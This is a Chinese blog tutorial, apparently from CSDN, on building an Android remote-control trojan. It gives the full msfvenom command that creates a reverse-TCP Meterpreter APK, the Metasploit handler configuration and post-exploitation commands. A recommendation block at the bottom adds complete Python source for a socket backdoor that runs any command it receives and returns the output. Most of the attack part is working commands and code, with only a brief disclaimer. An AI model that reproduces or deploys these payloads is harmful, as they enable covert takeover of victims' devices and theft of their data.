手机木马远程控制复现

1、环境搭建

  本次实验模拟的是msf,所以需要android模拟器,这里使用的是雷电模拟器下载、安装后进行环境配置。

点击设置>找到网络设置:开启网络桥接模式,IP设置DHCP

在这里插入图片描述
桥接模式需要驱动支持:点击安装

在这里插入图片描述

2、生成后门

  Msfvenom是用来生成后门的软件,它于 2015 年 6 月 8 日取代了 msfpayload 和 msfencode。使用时可以查看参数文档。或者在kali中输入msfvenom -h

MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

Options:
    -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options               List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>   Output format (use --list formats to list)
    -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
        --service-name    <value>    The service name to use when generating a service binary
        --sec-name        <value>    The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
        --smallest                   Generate the smallest possible payload using all available encoders
        --encrypt         <value>    The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
        --encrypt-key     <value>    A key to be used for --encrypt
        --encrypt-iv      <value>    An initialization vector for --encrypt
    -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform> The platform for --payload (use --list platforms to list)
    -o, --out             <path>     Save the payload to a file
    -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
    -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
        --pad-nops                   Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
    -s, --space           <length>   The maximum size of the resulting payload
        --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      <count>    The number of times to encode the payload
    -c, --add-code        <path>     Specify an additional win32 shellcode file to include
    -x, --template        <path>     Specify a custom executable file to use as a template
    -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
    -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help                       Show this message

启动kali,在终端输入命令:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.204.158 LPORT=5555 R > hurricane.apk

LHOST=192.168.204.158       //这里LHOST设置成kali的ip
set LPORT 5555       //端口设置成生成木马所监听的端口
run      //命令执行

在这里插入图片描述
将生成的文件复制到自己的主机上,然后在雷电模拟器安装:
在这里插入图片描述
回到我们的kali,启动metasploit进行攻击。

3、渗透攻击

启动metasploit

msfconsole

metasploit配置及监听:

use exploit/multi/handler     //使用模块
set payload android/meterpreter/reversr_tcp   //设置攻击载荷
set LHOST XXXX.XXXX.XXX.XXXX    //配置kali的IP
set LPORT 5555     //监听端口要跟上面生成木马的端口一样
show options      //查看相关的配置情况 
run         //执行 

在这里插入图片描述
在模拟器运行木马,进行监听
在这里插入图片描述

4、后渗透

sysinfo     //查看手机信息

在这里插入图片描述


ifconfig        //查看网络信息

在这里插入图片描述


可以输入?获取相关的命令进行实验,这次手机木马的实验就算完成了。此文章只用于个人学习分享,在实验时,可以自己用手机测试,不用故意发给别人恶搞。

在这里插入图片描述

  • 2
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
远程控制木马是一种恶意软件,它通过网络连接远程主机,并允许攻击者在目标计算机上执行各种操作和命令。根据提供的引用内容,以下是一个使用Python编写的远程控制木马的示例代码: ```python # 服务端(server)程序 import socket import os def attack(): try: s = socket.socket() s.bind(('0.0.0.0', 6667)) # 使用默认地址,所有设备均可访问该服务器的6667端口 s.listen() # 对6667端口进行监听 channel, client = s.accept() # 进入阻塞状态,accept() 返回元组,接受来自客户端的数据 # channel: 新的socket对象用于标识出服务器和哪个客户端连接进行通信 # client: 客户端的IP和端口 while True: receive = channel.recv(1024).decode() # 接收来自客户端的命令 reply = os.popen(receive).read() # 执行命令,并获取执行结果 channel.send(f"命令{receive}的运行结果:\n{reply}".encode()) # 将结果发送回客户端 except: s.close() if __name__ == '__main__': attack() # 客户端(client)程序 import socket s = socket.socket() s.connect(('192.168.137.1', 6667)) # 192.168.137.1是socket服务器的地址 while True: sendstr = input("请输入消息:") s.send(sendstr.encode()) # 将命令发送给服务器 receive = s.recv(1024).decode() # 接收服务器的回复 print(f"服务器回复:{receive}") ``` 请注意,远程控制木马是一种非法行为,严重侵犯他人隐私和安全。在进行任何网络活动时,请始终遵守法律和道德规范。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [基于Python实现socket远程木马](https://blog.csdn.net/weixin_49472648/article/details/125308268)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值